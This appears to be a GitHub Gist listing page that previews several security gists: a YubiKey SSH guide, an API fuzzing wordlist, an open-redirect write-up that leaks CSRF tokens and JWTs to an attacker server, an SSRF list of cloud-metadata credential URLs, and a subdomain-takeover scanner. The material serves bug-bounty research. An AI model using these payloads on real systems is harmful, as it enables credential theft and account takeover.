Skip to content

Instantly share code, notes, and snippets.

View 0xbharath's full-sized avatar
👨‍💻
Automating Appsec!

Bharath 0xbharath

👨‍💻
Automating Appsec!
350 followers · 291 following
View GitHub Profile
@Kranzes
Kranzes / guide.md
Last active June 23, 2024 09:40
SSH Resident Key Guide

Initial checks

Start by checking that there aren't any previous ssh keys inside the FIDO2 authenticator of your YubiKey. You can check if they exist by running the command below:

nix shell nixpkgs#yubikey-manager -c ykman fido credentials list

If the command above outputs a string mentioning "ssh" or "openssh", then you have already got a key generated and store on your YubiKey.

Evaluating additional authentication factors

Before generating a new ssh key to store on your YubiKey you must consider which additional required authentication factors you want to use. Below you can see a table with the available factors and their corresponding command:

@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active July 3, 2024 14:04
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@stefanocoding
stefanocoding / csrf_jwt_redirect_leak.md
Created May 15, 2019 23:46

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@bvaughn
bvaughn / profiling-a-chrome-extension.md
Last active February 21, 2024 05:46
Profiling a custom Chrome extension

Chrome's profiler ("Performance tab) is very useful for measuring JavaScript performance, but what if you want to measure the performance of a custom extension?

For example, what if I would like to profile the following interaction:

The interaction we want to profile

@jhaddix
jhaddix / cloud_metadata.txt
Last active June 10, 2024 09:08 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@dboyd13
dboyd13 / aws-certified-security-specialist-study-notes.txt
Last active September 15, 2023 03:38
aws-certified-security-specialist-study-notes
___ _____ ___ _ _ __ _ _ ___ _ _ ___ _ _ _
/_\ \ / / __| ___ / __|___ _ _| |_(_)/ _(_)___ __| | / __| ___ __ _ _ _ _(_) |_ _ _ / __|_ __ ___ __(_)__ _| | |_ _ _
/ _ \ \/\/ /\__ \ |___| | (__/ -_) '_| _| | _| / -_) _` | \__ \/ -_) _| || | '_| | _| || | \__ \ '_ \/ -_) _| / _` | | _| || |
/_/ \_\_/\_/ |___/ \___\___|_| \__|_|_| |_\___\__,_| |___/\___\__|\_,_|_| |_|\__|\_, | |___/ .__/\___\__|_\__,_|_|\__|\_, |
|__/ |_| |__/
Notes taken in Mar-2018, from acloud.guru and AWS FAQ
___ _ _ _ __ _
/ __| ___ __ _ _ _ _(_) |_ _ _ / |/ \/ |
@haccer
haccer / scanio.sh
Last active July 2, 2024 14:16
PoC script to mass-locate vulnerable subdomains using results from Rapid7's Project Sonar
#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt
# Premium
function ech() {
spinner=( "|" "/" "-" "\\" )
while true; do
for i in ${spinner[@]}; do
echo -ne "\r[$i] $1"
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active June 23, 2024 20:29
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@Fitblip
Fitblip / slack_notification.py
Created June 24, 2017 06:17
An example for certstream to send a slack notification.
import certstream
import json
import requests
# Set the webhook_url to the one provided by Slack when you create the webhook at https://my.slack.com/services/new/incoming-webhook/
WEBHOOK_URL = os.environ["SLACK_WEBHOOK_URL"]
NEEDLE = "coinbase"
# Search for domains with a keyword in them and write the corresponding certificate to a file
@stevenringo
stevenringo / reinvent-2016-youtube.md
Last active April 17, 2024 18:40
Links to YouTube recordings of AWS re:Invent sessions